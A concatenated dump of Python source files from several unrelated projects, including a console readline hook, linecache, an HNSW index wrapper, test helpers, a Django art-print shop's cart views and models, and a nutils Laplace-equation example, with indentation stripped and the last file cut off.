def get_libc():
if WINDOWS:
path = "msvcrt"
else:
path = ctypes.util.find_library("c")
if path is None:
raise RuntimeError("cannot locate libc")
return cdll[path]
LIBC = get_libc()
PyMem_Malloc = pythonapi.PyMem_Malloc
PyMem_Malloc.restype = c_size_t
PyMem_Malloc.argtypes = [c_size_t]
strncpy = LIBC.strncpy
strncpy.restype = c_char_p
strncpy.argtypes = [c_char_p, c_char_p, c_size_t]
HOOKFUNC = CFUNCTYPE(c_char_p, c_void_p, c_void_p, c_char_p)
#PyOS_ReadlineFunctionPointer = c_void_p.in_dll(pythonapi, "PyOS_ReadlineFunctionPointer")
def new_zero_terminated_string(b):
p = PyMem_Malloc(len(b) + 1)
strncpy(cast(p, c_char_p), b, len(b) + 1)
return p
def check_encodings():
if sys.stdin.encoding != sys.stdout.encoding:
# raise RuntimeError("sys.stdin.encoding != sys.stdout.encoding, readline hook doesn't know, which one to use to decode prompt")
warnings.warn("sys.stdin.encoding == {!r}, whereas sys.stdout.encoding == {!r}, readline hook consumer may assume they are the same".format(sys.stdin.encoding, sys.stdout.encoding),
RuntimeWarning, stacklevel=3)
def stdio_readline(prompt=""):
sys.stdout.write(prompt)
sys.stdout.flush()
return sys.stdin.readline()
class ReadlineHookManager:
def __init__(self):
self.readline_wrapper_ref = HOOKFUNC(self.readline_wrapper)
self.address = cast(self.readline_wrapper_ref, c_void_p).value
#self.original_address = PyOS_ReadlineFunctionPointer.value
self.readline_hook = None
def readline_wrapper(self, stdin, stdout, prompt):
try:
try:
check_encodings()
except RuntimeError:
traceback.print_exc(file=sys.stderr)
try:
prompt = prompt.decode("utf-8")
except UnicodeDecodeError:
prompt = ""
else:
prompt = prompt.decode(sys.stdout.encoding)
try:
line = self.readline_hook(prompt)
except KeyboardInterrupt:
return 0
else:
return new_zero_terminated_string(line.encode(sys.stdin.encoding))
except:
self.restore_original()
print("Internal win_unicode_console error, disabling custom readline hook...", file=sys.stderr)
traceback.print_exc(file=sys.stderr)
return new_zero_terminated_string(b"\n")
def install_hook(self, hook):
self.readline_hook = hook
PyOS_ReadlineFunctionPointer.value = self.address
def restore_original(self):
self.readline_hook = None
PyOS_ReadlineFunctionPointer.value = self.original_address
class PyReadlineManager:
def __init__(self):
self.original_codepage = pyreadline.unicode_helper.pyreadline_codepage
def set_codepage(self, codepage):
pyreadline.unicode_helper.pyreadline_codepage = codepage
def restore_original(self):
self.set_codepage(self.original_codepage)
def pyreadline_is_active():
if not pyreadline:
return False
ref = pyreadline.console.console.readline_ref
if ref is None:
return False
return cast(ref, c_void_p).value == PyOS_ReadlineFunctionPointer.value
manager = ReadlineHookManager()
if pyreadline:
pyreadline_manager = PyReadlineManager()
# PY3 # def enable(*, use_pyreadline=True):
def enable(use_pyreadline=True):
check_encodings()
if use_pyreadline and pyreadline:
pyreadline_manager.set_codepage(sys.stdin.encoding)
# pyreadline assumes that encoding of all sys.stdio objects is the same
if not pyreadline_is_active():
manager.install_hook(stdio_readline)
else:
manager.install_hook(stdio_readline)
def disable():
if pyreadline:
pyreadline_manager.restore_original()
else:
manager.restore_original()
```
#### File: src/Lib/linecache.py
```python
import functools
import sys
import os
import tokenize
__all__ = ["getline", "clearcache", "checkcache", "lazycache"]
# The cache. Maps filenames to either a thunk which will provide source code,
# or a tuple (size, mtime, lines, fullname) once loaded.
cache = {}
def clearcache():
"""Clear the cache entirely."""
cache.clear()
def getline(filename, lineno, module_globals=None):
"""Get a line for a Python source file from the cache.
Update the cache if it doesn't contain an entry for this file already."""
lines = getlines(filename, module_globals)
if 1 <= lineno <= len(lines):
return lines[lineno - 1]
return ''
def getlines(filename, module_globals=None):
"""Get the lines for a Python source file from the cache.
Update the cache if it doesn't contain an entry for this file already."""
if filename in cache:
entry = cache[filename]
if len(entry) != 1:
return cache[filename][2]
try:
return updatecache(filename, module_globals)
except MemoryError:
clearcache()
return []
def checkcache(filename=None):
"""Discard cache entries that are out of date.
(This is not checked upon each call!)"""
if filename is None:
filenames = list(cache.keys())
elif filename in cache:
filenames = [filename]
else:
return
for filename in filenames:
entry = cache[filename]
if len(entry) == 1:
# lazy cache entry, leave it lazy.
continue
size, mtime, lines, fullname = entry
if mtime is None:
continue # no-op for files loaded via a __loader__
try:
stat = os.stat(fullname)
except OSError:
cache.pop(filename, None)
continue
if size != stat.st_size or mtime != stat.st_mtime:
cache.pop(filename, None)
def updatecache(filename, module_globals=None):
"""Update a cache entry and return its list of lines.
If something's wrong, print a message, discard the cache entry,
and return an empty list."""
if filename in cache:
if len(cache[filename]) != 1:
cache.pop(filename, None)
if not filename or (filename.startswith('<') and filename.endswith('>')):
return []
if not os.path.isabs(filename):
# Do not read builtin code from the filesystem.
import __res
key = __res.importer.file_source(filename)
if key:
data = __res.find(key)
assert data is not None, filename
data = data.decode('UTF-8')
lines = [line + '\n' for line in data.splitlines()]
cache[filename] = (len(data), None, lines, filename)
return cache[filename][2]
fullname = filename
try:
stat = os.stat(fullname)
except OSError:
basename = filename
# Realise a lazy loader based lookup if there is one
# otherwise try to lookup right now.
if lazycache(filename, module_globals):
try:
data = cache[filename][0]()
except (ImportError, OSError):
pass
else:
if data is None:
# No luck, the PEP302 loader cannot find the source
# for this module.
return []
cache[filename] = (
len(data),
None,
[line + '\n' for line in data.splitlines()],
fullname
)
return cache[filename][2]
# Try looking through the module search path, which is only useful
# when handling a relative filename.
if os.path.isabs(filename):
return []
for dirname in sys.path:
try:
fullname = os.path.join(dirname, basename)
except (TypeError, AttributeError):
# Not sufficiently string-like to do anything useful with.
continue
try:
stat = os.stat(fullname)
break
except OSError:
pass
else:
return []
try:
with tokenize.open(fullname) as fp:
lines = fp.readlines()
except OSError:
return []
if lines and not lines[-1].endswith('\n'):
lines[-1] += '\n'
size, mtime = stat.st_size, stat.st_mtime
cache[filename] = size, mtime, lines, fullname
return lines
def lazycache(filename, module_globals):
"""Seed the cache for filename with module_globals.
The module loader will be asked for the source only when getlines is
called, not immediately.
If there is an entry in the cache already, it is not altered.
:return: True if a lazy load is registered in the cache,
otherwise False. To register such a load a module loader with a
get_source method must be found, the filename must be a cacheable
filename, and the filename must not be already cached.
"""
if filename in cache:
if len(cache[filename]) == 1:
return True
else:
return False
if not filename or (filename.startswith('<') and filename.endswith('>')):
return False
# Try for a __loader__, if available
if module_globals and '__loader__' in module_globals:
name = module_globals.get('__name__')
loader = module_globals['__loader__']
get_source = getattr(loader, 'get_source', None)
if name and get_source:
get_lines = functools.partial(get_source, name)
cache[filename] = (get_lines,)
return True
return False
```
#### File: hnsw/hnsw/hnsw.py
```python
import sys
import imp
import os
from six import iteritems
from enum import IntEnum
from contextlib import contextmanager
import json
def get_so_paths(dir_name):
dir_name = os.path.join(os.path.dirname(__file__), dir_name)
list_dir = os.listdir(dir_name) if os.path.isdir(dir_name) else []
return [os.path.join(dir_name, so_name) for so_name in list_dir if so_name.split('.')[-1] in ['so', 'pyd']]
def get_hnsw_bin_module():
if '_hnsw' in sys.modules:
return sys.modules['_hnsw']
so_paths = get_so_paths('./')
for so_path in so_paths:
try:
loaded_hnsw = imp.load_dynamic('_hnsw', so_path)
sys.modules['hnsw._hnsw'] = loaded_hnsw
return loaded_hnsw
except ImportError:
pass
from . import _hnsw
return _hnsw
@contextmanager
def log_fixup():
_hnsw._set_logger(sys.stdout)
try:
yield
finally:
_hnsw._reset_logger()
class EDistance(IntEnum):
DotProduct = 0
L1 = 1
L2Sqr = 2
class EVectorComponentType(IntEnum):
Float = 0
I8 = 1
I32 = 2
_hnsw = get_hnsw_bin_module()
HnswException = _hnsw.HnswException
_DenseVectorStorage = {
EVectorComponentType.Float: _hnsw._DenseFloatVectorStorage,
EVectorComponentType.I8: _hnsw._DenseI8VectorStorage,
EVectorComponentType.I32: _hnsw._DenseI32VectorStorage
}
_HnswDenseVectorIndex = {
EVectorComponentType.Float: _hnsw._HnswDenseFloatVectorIndex,
EVectorComponentType.I8: _hnsw._HnswDenseI8VectorIndex,
EVectorComponentType.I32: _hnsw._HnswDenseI32VectorIndex
}
_transform_mobius = {
EVectorComponentType.Float: _hnsw._transform_mobius_float,
EVectorComponentType.I8: _hnsw._transform_mobius_i8,
EVectorComponentType.I32: _hnsw._transform_mobius_i32
}
_OnlineHnswDenseVectorIndex = {
EVectorComponentType.Float: _hnsw._OnlineHnswDenseFloatVectorIndex,
EVectorComponentType.I8: _hnsw._OnlineHnswDenseI8VectorIndex,
EVectorComponentType.I32: _hnsw._OnlineHnswDenseI32VectorIndex,
}
class Pool:
"""
Pool is a storage of vectors
"""
def __init__(self, vectors_path, dtype, dimension, vectors_bin_data=None):
"""
Pool is a storage of vectors. You can create it from row-major binary file or
binary data of vectors.
Parameters
----------
vectors_path : string
Path to binary file with vectors.
dtype : EVectorComponentType
Type of vectors.
dimension : int
Dimension of vectors.
vectors_bin_data : bytes
Binary data of vectors.
"""
self.vectors_path = vectors_path
self.dtype = dtype
self.dimension = dimension
assert (vectors_bin_data is None) ^ (vectors_path is None)
if vectors_path is not None:
self._storage = _DenseVectorStorage[dtype](vectors_path, dimension)
self._data = None
if vectors_bin_data is not None:
self._storage = _DenseVectorStorage[dtype](None, dimension, vectors_bin_data)
self._data = vectors_bin_data
@classmethod
def from_file(cls, vectors_path, dtype, dimension):
"""
Create pool from binary file.
Parameters
----------
vectors_path : string
Path to binary file with vectors.
dtype : EVectorComponentType
Type of vectors.
dimension : int
Dimension of vectors.
"""
return Pool(vectors_path, dtype, dimension, None)
@classmethod
def from_bytes(cls, vectors_bin_data, dtype, dimension):
"""
Create pool from binary data.
Parameters
----------
vectors_bin_data : bytes
Binary data of vectors.
dtype : EVectorComponentType
Type of vectors.
dimension : int
Dimension of vectors.
"""
return Pool(None, dtype, dimension, vectors_bin_data)
def get_item(self, id):
"""
Get item from storage by id.
Parameters
----------
id : int
Index of item in storage.
Returns
-------
item : numpy.ndarray
"""
return self._storage._get_item(id)
def get_num_items(self):
"""
Get the number of items in storage.
Returns
-------
num_items : int
"""
return self._storage._get_num_items()
def transform_mobius(pool):
"""
Transform pool for fast dot product search on HNSW graph
https://papers.nips.cc/paper/9032-mobius-transformation-for-fast-inner-product-search-on-graph.pdf
Parameters
----------
pool : Pool
Returns
-------
transformed_pool : Pool
"""
transformed_pool = Pool.from_bytes(bytes(0), EVectorComponentType.Float, pool.dimension)
transformed_pool._storage = _transform_mobius[pool.dtype](pool._storage)
return transformed_pool
class Hnsw:
"""
Class for building, loading and working with Hierarchical Navigable Small World index.
"""
def __init__(self):
"""
Create object for working with HNSW.
"""
self._index = None
self._data = None
def build(self, pool, distance, max_neighbors=None, search_neighborhood_size=None, num_exact_candidates=None,
batch_size=None, upper_level_batch_size=None, level_size_decay=None, num_threads=None, verbose=False,
report_progress=True, snapshot_file=None, snapshot_interval=None):
"""
Build index with given options.
Parameters
----------
pool : Pool
Pool of vectors for which index will be built.
distance : EDistance
Distance that should be used for finding nearest vectors.
max_neighbors : int (default=32)
Maximum number of neighbors that every item can be connected with.
search_neighborhood_size : int (default=300)
Search neighborhood size for ANN-search.
Higher values improve search quality in expense of building time.
num_exact_candidates : int (default=100)
Number of nearest vectors to take from batch.
Higher values improve search quality in expense of building time.
batch_size : int (default=1000)
Number of items that added to graph on each step of algorithm.
upper_level_batch_size : int (default=40000)
Batch size for building upper levels.
level_size_decay : int (default=max_neighbors/2)
Base of exponent for decaying level sizes.
num_threads : int (default=number of CPUs)
Number of threads for building index.
report_progress : bool (default=True)
Print progress of building.
verbose : bool (default=False)
Print additional information about time of building.
snapshot_file : string (default=None)
Path for saving snapshots during the index building.
snapshot_interval : int (default=600)
Interval between saving snapshots (seconds).
Snapshot is saved after building each level also.
"""
params = {}
not_params = ["not_params", "self", "params", "__class__", "pool", "distance"]
for key, value in iteritems(locals()):
if key not in not_params and value is not None:
params[key] = value
self._index = _HnswDenseVectorIndex[pool.dtype](pool._storage, distance)
with log_fixup():
self._index._build(json.dumps(params))
def _check_index(self):
if self._index is None:
raise HnswException("Index is not built and not loaded")
def save(self, index_path):
"""
Save index to file.
Parameters
----------
index_path : string
Path to file for saving index.
"""
self._check_index()
self._index._save(index_path)
def load(self, index_path, pool, distance):
"""
Load index from file.
Parameters
----------
index_path : string
Path to file for loading index.
pool : Pool
Pool of vectors for which index will be loaded.
distance : EDistance
Distance that should be used for finding nearest vectors.
"""
self._index = _HnswDenseVectorIndex[pool.dtype](pool._storage, distance)
self._index._load(index_path)
self._data = None
def load_from_bytes(self, index_data, pool, distance):
"""
Load index from bytes.
Parameters
----------
index_data : bytes
Index binary data.
pool : Pool
Pool of vectors for which index will be loaded.
distance : EDistance
Distance that should be used for finding nearest vectors.
"""
self._index = _HnswDenseVectorIndex[pool.dtype](pool._storage, distance)
self._index._load_from_bytes(index_data)
self._data = index_data
def get_nearest(self, query, top_size, search_neighborhood_size, distance_calc_limit=0):
"""
Get approximate nearest neighbors for query from index.
Parameters
----------
query : list or numpy.ndarray
Vector for which nearest neighbors should be found.
top_size : int
Required number of neighbors.
search_neighborhood_size : int
Search neighborhood size for ANN-search.
Higher values improve search quality in expense of search time.
It should be equal or greater than top_size.
distance_calc_limit : int (default=0)
Limit of distance calculation.
To guarantee satisfactory search time at the expense of quality.
0 is equivalent to no limit.
Returns
-------
neighbors : list of tuples (id, distance)
"""
self._check_index()
return self._index._get_nearest(query, top_size, search_neighborhood_size, distance_calc_limit)
class HnswEstimator:
"""
Class for building, loading and working with Hierarchical Navigable Small World index with SciKit-Learn
Estimator compatible interface.
Mostly drop-in replacement for sklearn.neighbors.NearestNeighbors (except for some parameters)
"""
def __init__(self, n_neighbors=5,
distance=EDistance.DotProduct, max_neighbors=32, search_neighborhood_size=300,
num_exact_candidates=100, batch_size=1000, upper_level_batch_size=40000,
level_size_decay=None):
"""
Parameters
----------
n_neighbors : int, default=5
Number of neighbors to use by default for kneighbors queries.
distance : EDistance
Distance that should be used for finding nearest vectors.
max_neighbors : int (default=32)
Maximum number of neighbors that every item can be connected with.
search_neighborhood_size : int (default=300)
Search neighborhood size for ANN-search.
Higher values improve search quality in expense of building time.
num_exact_candidates : int (default=100)
Number of nearest vectors to take from batch.
Higher values improve search quality in expense of building time.
batch_size : int (default=1000)
Number of items that added to graph on each step of algorithm.
upper_level_batch_size : int (default=40000)
Batch size for building upper levels.
level_size_decay : int (default=max_neighbors/2)
Base of exponent for decaying level sizes.
"""
for key, value in iteritems(locals()):
if key not in ['self', '__class__']:
setattr(self, key, value)
def _check_index(self):
if self._index is None:
raise HnswException("Index is not built and not loaded")
def fit(self, X, y=None, num_threads=None, verbose=False, report_progress=True, snapshot_file=None,
snapshot_interval=600):
"""
Fit the HNSW model.
Parameters
----------
X : array-like of shape (n_samples, n_values)
y: None
Added to be compatible with Estimator API
num_threads : int (default=number of CPUs)
Number of threads for building index.
report_progress : bool (default=True)
Print progress of building.
verbose : bool (default=False)
Print additional information about time of building.
snapshot_file : string (default=None)
Path for saving snapshots during the index building.
snapshot_interval : int (default=600)
Interval between saving snapshots (seconds).
Returns
-------
model : HnswEstimator
"""
self._index, self._index_data = _hnsw._init_index(X, self.distance)
params = self._get_params(return_none=False)
not_params = ["not_params", "self", "params", "__class__", "X", "y"]
for key, value in iteritems(locals()):
if key not in not_params and value is not None:
params[key] = value
del params['distance']
with log_fixup():
self._index._build(json.dumps(params))
return self
def _get_params(self, return_none):
params = {}
for key, value in self.__dict__.items():
if key[0] != '_' and (return_none or (value is not None)):
params[key] = value
return params
def get_params(self, deep=True):
"""
Get parameters for this estimator.
"""
return self._get_params(return_none=True)
def set_params(self, **params):
"""
Set the parameters of this estimator.
Parameters
----------
**params : dict
HnswEstimator parameters.
Returns
-------
self : HnswEstimator instance
"""
if not params:
return self
valid_params = self._get_params(return_none=True)
for key, value in params.items():
if key not in valid_params:
raise HnswException(
'Invalid parameter %s for HnswEstimator. '
'Check the list of available parameters '
'with `get_params().keys()`.'
)
setattr(self, key, value)
return self
@property
def effective_metric_(self):
"""
Returns
-------
Distance that should be used for finding nearest vectors.
"""
return self.distance
@property
def n_samples_fit_(self):
"""
Returns
-------
Number of samples in the fitted data.
"""
self._check_index()
return self._index_data.shape[0]
def kneighbors(self, X=None, n_neighbors=None, return_distance=True, search_neighborhood_size=None,
distance_calc_limit=0):
"""Finds the approximate K-neighbors of a point.
Returns indices of and distances to the neighbors of each point.
Parameters
----------
X : array-like, shape (n_queries, n_features) or None
The query point or points.
If not provided, neighbors of each indexed point are returned.
In this case, the query point is not considered its own neighbor.
n_neighbors : int, default=None
Number of neighbors required for each sample. The default is the
value passed to the constructor.
return_distance : bool, default=True
Whether or not to return the distances.
search_neighborhood_size : int, default=None
Search neighborhood size for ANN-search.
Higher values improve search quality in expense of search time.
It should be equal or greater than top_size.
If None set to n_neighbors * 2.
distance_calc_limit : int (default=0)
Limit of distance calculation.
To guarantee satisfactory search time at the expense of quality.
0 is equivalent to no limit.
Returns
-------
neigh_dist :numpy.ndarray of shape (n_queries, n_neighbors)
Array representing the lengths to points, only present if
return_distance=True
neigh_ind : numpy.ndarray of shape (n_queries, n_neighbors)
Indices of the nearest points in the population matrix.
"""
self._check_index()
if X is None:
X = self._index_data
if n_neighbors is None:
n_neighbors = self.n_neighbors
if search_neighborhood_size is None:
search_neighborhood_size = n_neighbors * 2
return self._index._kneighbors(X, n_neighbors, return_distance, self.distance, search_neighborhood_size,
distance_calc_limit)
class OnlineHnsw:
"""
Class for building and working with Online Hierarchical Navigable Small World index.
"""
def __init__(self, dtype, dimension, distance, max_neighbors=None, search_neighborhood_size=None, num_vertices=None, level_size_decay=None):
"""
Create object with given options.
Parameters
----------
dtype : EVectorComponentType
Type of vectors.
dimension : int
Dimension of vectors.
distance : EDistance
Distance that should be used for finding nearest vectors.
max_neighbors : int (default=32)
Maximum number of neighbors that every item can be connected with.
search_neighborhood_size : int (default=300)
Search neighborhood size for ANN-search.
Higher values improve search quality in expense of building time.
num_vertices : int (default=0)
Expected number of vectors in storage.
level_size_decay : int (default=max_neighbors/2)
Base of exponent for decaying level sizes.
"""
self.dtype = dtype
self.dimension = dimension
params = {}
all_params = ["max_neighbors", "search_neighborhood_size", "num_vertices", "level_size_decay"]
for key, value in iteritems(locals()):
if key in all_params and value is not None:
params[key] = value
self._online_index = _OnlineHnswDenseVectorIndex[dtype](dimension, distance, json.dumps(params))
def get_nearest_and_add_item(self, query):
"""
Get approximate nearest neighbors for query from index and add item to index
Parameters
----------
query : list or numpy.ndarray
Vector for which nearest neighbors should be found.
Vector which should be added in index.
Returns
-------
neighbors : list of tuples (id, distance) with length = search_neighborhood_size
"""
return self._online_index._get_nearest_neighbors_and_add_item(query)
def get_nearest(self, query, top_size=0):
"""
Get approximate nearest neighbors for query from index.
Parameters
----------
query : list or numpy.ndarray
Vector for which nearest neighbors should be found.
top_size : int
Required number of neighbors.
Returns
-------
neighbors : list of tuples (id, distance)
"""
return self._online_index._get_nearest_neighbors(query, top_size)
def add_item(self, item):
"""
Add item in index.
Parameters
----------
item : list or numpy.ndarray
Vector which should be added in index.
"""
self._online_index._add_item(item)
def get_item(self, id):
"""
Get item from storage by id.
Parameters
----------
id : int
Index of item in storage.
Returns
-------
item : numpy.ndarray
"""
return self._online_index._get_item(id)
def get_num_items(self):
"""
Get the number of items in storage.
Returns
-------
num_items : int
"""
return self._online_index._get_num_items()
```
#### File: python/hnsw/setup.py
```python
from setuptools import setup, Extension
from distutils.command.build_ext import build_ext
from distutils.dir_util import mkpath
from distutils.file_util import copy_file
class CopyBuild(build_ext):
def build_extension(self, ext):
mkpath(self.build_lib)
copy_file(ext.sources[0], self.get_ext_fullpath(ext.name))
# How to build and upload package to Yandex PyPI can be found here: https://wiki.yandex-team.ru/pypi/
# Before building and uploading _hnsw.so should be built from 'hnsw' folder like this:
# ya make -r -DUSE_ARCADIA_PYTHON=no -DOS_SDK=local -DPYTHON_CONFIG=python2-config
# Run setup.py with python which config you used for building _hnsw.so on previous step.
setup(
name='hnsw',
version='0.2.1',
description='Python wrapper for Hierarchical Navigable Small World index implementation',
author='<NAME>',
author_email='<EMAIL>',
packages=['hnsw'],
cmdclass={'build_ext': CopyBuild},
ext_modules=[Extension('hnsw/_hnsw', ['hnsw/_hnsw.so'])]
)
```
#### File: runtime_py3/test/test_resources.py
```python
import importlib.resources as ir
import pytest
@pytest.mark.parametrize("package, resource", (
("resources", "foo.txt"),
("resources.submodule", "bar.txt")
))
def test_is_resource_good_path(package, resource):
assert ir.is_resource(package, resource)
@pytest.mark.parametrize("package, resource", (
("resources", "111.txt"),
("resources.submodule", "222.txt")
))
def test_is_resource_missing(package, resource):
assert not ir.is_resource(package, resource)
def test_is_resource_subresource_directory():
# Directories are not resources.
assert not ir.is_resource("resources", "submodule")
@pytest.mark.parametrize("package, resource, expected", (
("resources", "foo.txt", b"bar"),
("resources.submodule", "bar.txt", b"foo")
))
def test_read_binary_good_path(package, resource, expected):
assert ir.read_binary(package, resource) == expected
def test_read_binary_missing():
with pytest.raises(FileNotFoundError):
ir.read_binary("resources", "111.txt")
@pytest.mark.parametrize("package, resource, expected", (
("resources", "foo.txt", "bar"),
("resources.submodule", "bar.txt", "foo")
))
def test_read_text_good_path(package, resource, expected):
assert ir.read_text(package, resource) == expected
def test_read_text_missing():
with pytest.raises(FileNotFoundError):
ir.read_text("resources", "111.txt")
@pytest.mark.parametrize("package, expected", (
("resources", ["submodule", "foo.txt"]),
("resources.submodule", ["bar.txt"])
))
def test_contents_good_path(package, expected):
assert sorted(ir.contents(package)) == sorted(expected)
```
#### File: testing/filter/filter.py
```python
import re
import fnmatch
import logging
logger = logging.getLogger(__name__)
TEST_SUBTEST_SEPARATOR = '::'
PARSE_TAG_RE = re.compile("([+-]?[\w:]*)")
class FilterException(Exception):
mute = True
def fix_filter(flt):
if TEST_SUBTEST_SEPARATOR not in flt and "*" not in flt:
# user wants to filter by test module name
flt = flt + TEST_SUBTEST_SEPARATOR + "*"
return flt
def escape_for_fnmatch(s):
return s.replace("[", "[").replace("]", "]")
def make_py_file_filter(filter_names):
if filter_names is not None:
with_star = []
wo_star = set()
for flt in filter_names:
flt = flt.split(':')[0]
if '*' in flt:
with_star.append(flt.split('*')[0] + '*')
else:
wo_star.add(flt)
def predicate(filename):
if filter_names is None:
return True
return filename in wo_star or any([fnmatch.fnmatch(escape_for_fnmatch(filename), escape_for_fnmatch(filter_name)) for filter_name in with_star])
return predicate
def make_name_filter(filter_names):
filter_names = map(fix_filter, filter_names)
filter_full_names = set()
for name in filter_names:
if '*' not in name:
filter_full_names.add(name)
def predicate(testname):
return testname in filter_full_names or any([fnmatch.fnmatch(escape_for_fnmatch(testname), escape_for_fnmatch(filter_name)) for filter_name in filter_names])
return predicate
```
#### File: yatest/common/runtime_java.py
```python
import os
import tarfile
import contextlib
from . import runtime
_JAVA_DIR = []
def get_java_path(jdk_dir):
# deprecated - to be deleted
java_paths = (os.path.join(jdk_dir, 'bin', 'java'), os.path.join(jdk_dir, 'bin', 'java.exe'))
for p in java_paths:
if os.path.exists(p):
return p
for f in os.listdir(jdk_dir):
if f.endswith('.tar'):
with contextlib.closing(tarfile.open(os.path.join(jdk_dir, f))) as tf:
tf.extractall(jdk_dir)
for p in java_paths:
if os.path.exists(p):
return p
return ''
def get_build_java_dir(jdk_dir):
versions = [8, 10, 11, 12, 13, 14, 15, 16, 17]
if not _JAVA_DIR:
for version in versions:
jdk_tar_path = os.path.join(jdk_dir, "jdk{}.tar".format(version))
if os.path.exists(jdk_tar_path):
jdk_dir = runtime.build_path('jdk4test')
with contextlib.closing(tarfile.open(jdk_tar_path)) as tf:
tf.extractall(jdk_dir)
assert os.path.exists(os.path.join(jdk_dir, "bin", "java"))
_JAVA_DIR.append(jdk_dir)
break
else:
_JAVA_DIR.append(None)
return _JAVA_DIR[0]
``` |
{
"source": "JochenFM/art_prints_ms4",
"score": 2
} |
#### File: art_prints_ms4/cart/views.py
```python
from django.shortcuts import render, redirect, HttpResponse, get_object_or_404
from django.contrib import messages
from products.models import Product
# Create your views here.
def view_cart(request):
""" a view to return the cart contents page """
return render(request, 'cart/cart.html')
def add_to_cart(request, item_id):
"""add the specified product to the shopping cart"""
product = get_object_or_404(Product, pk=item_id)
quantity = int(request.POST.get('quantity'))
redirect_url = request.POST.get('redirect_url')
cart = request.session.get('cart', {})
cart[item_id] = quantity
messages.success(request, f'Added {product.name} to your cart')
request.session['cart'] = cart
return redirect(redirect_url)
def remove_from_cart(request, item_id):
"""Remove the item from the shopping cart"""
try:
product = get_object_or_404(Product, pk=item_id)
cart = request.session.get('cart', {})
cart.pop(item_id)
messages.success(request, f'Removed {product.name} from your cart')
request.session['cart'] = cart
return HttpResponse(status=200)
except Exception as e:
messages.error(request, f'Error removing item: {e}')
return HttpResponse(status=500)
```
#### File: art_prints_ms4/home/models.py
```python
from django.db import models
class Category(models.Model):
# this name should be readable in other code, can be mono_cards
class Meta:
verbose_name_plural = 'Categories'
name = models.CharField(max_length=254, null=True, blank=True)
# friendly name is for front end, can be Mono Cards
friendly_name = models.CharField(max_length=254, null=True, blank=True)
# string method to return category model
def __str__(self):
return self.name
# model method to return the friendly name if needed
def get_friendly_name(self):
return self.friendly_name
# product model
class Product(models.Model):
category = models.ForeignKey('Category', null=True, blank=True,
on_delete=models.SET_NULL)
name = models.CharField(max_length=254)
author = models.CharField(max_length=254, null=True, blank=True)
description = models.TextField()
price = models.DecimalField(max_digits=6, decimal_places=2)
condition = models.DecimalField(max_digits=1, decimal_places=0, null=True,
blank=True)
dimension = models.CharField(max_length=40, null=True, blank=True)
year = models.DecimalField(max_digits=6, decimal_places=0, null=True,
blank=True)
image_url = models.URLField(max_length=1024, null=True, blank=True)
image = models.ImageField(null=True, blank=True)
def __str__(self):
return self.name
``` |
{
"source": "JochenHinz/nutils",
"score": 3
} |
#### File: nutils/examples/laplace.py
```python
import nutils, numpy
# The main function defines the parameter space for the script. Configurable
# parameters are the mesh density (in number of elements along an edge),
# element type (square, triangle, or mixed), type of basis function (std or
# spline, with availability depending on element type), and polynomial degree.
def main(nelems: 'number of elements along edge' = 10,
etype: 'type of elements (square/triangle/mixed)' = 'square',
btype: 'type of basis function (std/spline)' = 'std',
degree: 'polynomial degree' = 1):
# A unit square domain is created by calling the
# :func:`nutils.mesh.unitsquare` mesh generator, with the number of elements
# along an edge as the first argument, and the type of elements ("square",
# "triangle", or "mixed") as the second. The result is a topology object
# ``domain`` and a vectored valued geometry function ``geom``.
domain, geom = nutils.mesh.unitsquare(nelems, etype)
# To be able to write index based tensor contractions, we need to bundle all
# relevant functions together in a namespace. Here we add the geometry ``x``,
# a scalar ``basis``, and the solution ``u``. The latter is formed by
# contracting the basis with a to-be-determined solution vector ``?lhs``.
ns = nutils.function.Namespace()
ns.x = geom
ns.basis = domain.basis(btype, degree=degree)
ns.u = 'basis_n ?lhs_n'
# We are now ready to implement the Laplace equation. In weak form, the
# solution is a scalar field :math:`u` for which:
#
# .. math:: ∀ v: ∫_Ω v_{,k} u_{,k} - ∫_{Γ_n} v f = 0.
#
# By linearity the test function :math:`v` can be replaced by the basis that
# spans its space. The result is an integral ``res`` that evaluates to a
# vector matching the size of the function space.
res = domain.integral('basis_n,i u_,i d:x' @ ns, degree=degree*2)
res -= domain.boundary['right'].integral('basis_n cos(1) cosh(x_1) d:x' @ ns, degree=degree*2)
# The Dirichlet constraints are set by finding the coefficients that minimize
# the error:
#
# .. math:: \min_u ∫_{\Gamma_d} (u - u_d)^2
#
# The resulting ``cons`` array holds numerical values for all the entries of
# ``?lhs`` that contribute (up to ``droptol``) to the minimization problem.
# All remaining entries are set to ``NaN``, signifying that these degrees of
# freedom are unconstrained.
sqr = domain.boundary['left'].integral('u^2 d:x' @ ns, degree=degree*2)
sqr += domain.boundary['top'].integral('(u - cosh(1) sin(x_0))^2 d:x' @ ns, degree=degree*2)
cons = nutils.solver.optimize('lhs', sqr, droptol=1e-15)
# The unconstrained entries of ``?lhs`` are to be determined such that the
# residual vector evaluates to zero in the corresponding entries. This step
# involves a linearization of ``res``, resulting in a jacobian matrix and
# right hand side vector that are subsequently assembled and solved. The
# resulting ``lhs`` array matches ``cons`` in the constrained entries.
lhs = nutils.solver.solve_linear('lhs', res, constrain=cons)
# Once all entries of ``?lhs`` are establised, the corresponding solution can
# be vizualised by sampling values of ``ns.u`` along with physical
# coordinates ``ns.x``, with the solution vector provided via the
# ``arguments`` dictionary. The sample members ``tri`` and ``hull`` provide
# additional inter-point information required for drawing the mesh and
# element outlines.
bezier = domain.sample('bezier', 9)
x, u = bezier.eval(['x_i', 'u'] @ ns, lhs=lhs)
nutils.export.triplot('solution.png', x, u, tri=bezier.tri, hull=bezier.hull)
# To confirm that our computation is correct, we use our knowledge of the
# analytical solution to evaluate the L2-error of the discrete result.
err = domain.integral('(u - sin(x_0) cosh(x_1))^2 d:x' @ ns, degree=degree*2).eval(lhs=lhs)**.5
nutils.log.user('L2 error: {:.2e}'.format(err))
return cons, lhs, err
# If the script is executed (as opposed to imported), :func:`nutils.cli.run`
# calls the main function with arguments provided from the command line. For
# example, to keep with the default arguments simply run :sh:`python3
# laplace.py`. To select mixed elements and quadratic basis functions add
# :sh:`python3 laplace.py etype=mixed degree=2`.
if __name__ == '__main__':
nutils.cli.run(main)
# Once a simulation is developed and tested, it is good practice to save a few
# strategicly chosen return values for routine regression testing. Here we use
# the standard :mod:`unittest` framework, with
# :func:`nutils.numeric.assert_allclose64` facilitating the embedding of
# desired results as compressed base64 data.
class test(nutils.testing.TestCase):
@nutils.testing.requires('matplotlib')
def test_default(self):
cons, lhs, err = main(nelems=4, etype='square', btype='std', degree=1)
nutils.numeric.assert_allclose64(cons, 'eNrbKPv1QZ3ip9sL1BgaILDYFMbaZwZj5ZnDW'
